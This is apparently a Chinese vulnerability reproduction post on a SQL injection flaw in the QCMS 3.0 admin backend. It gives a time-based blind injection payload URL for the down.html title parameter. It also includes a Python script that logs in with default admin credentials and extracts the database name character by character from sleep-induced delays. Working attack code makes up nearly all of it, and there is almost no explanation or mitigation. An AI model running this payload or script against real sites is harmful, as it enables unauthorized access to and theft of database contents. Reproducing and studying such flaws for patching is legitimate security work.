QCMS 3.0 sql注入漏洞
一、漏洞简介
二、漏洞影响
QCMS 3.0
三、复现过程
在后台下载管理处
构造payload
http://www.0-sec.org/backend/down.html?title=1';select if(ascii(substr((select database()), 1, 1))-113, 1, sleep(5));%23
这里直接附上简单脚本
# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests
def getCookie():
url = 'http://127.0.0.1/admin.php'
data = {
'username':'admin',
'password':'admin'
}
session = requests.session()
res = session.post(url, data)
return requests.utils.dict_from_cookiejar(res.cookies)
def getDatabase(url, arr, cookies):
str = ''
requests.session()
for i in range(1, 11):
for j in arr:
data = url + '?title=1\';select if(ascii(substr((select database()), %s, 1))-%s, 1, sleep(5));%%23' % (i, ord(j))
# print(data)
res = requests.get(url=data, cookies=cookies)
# print(res.elapsed.total_seconds())
if(res.elapsed.total_seconds() > 5):
str += j
print(str)
break
print('database=' + str)
if __name__ == '__main__':
url = 'http://127.0.0.1/backend/down.html'
arr = []
for i in range(48, 123):
arr.append(chr(i))
cookies = getCookie()
print(cookies)
getDatabase(url, arr, cookies)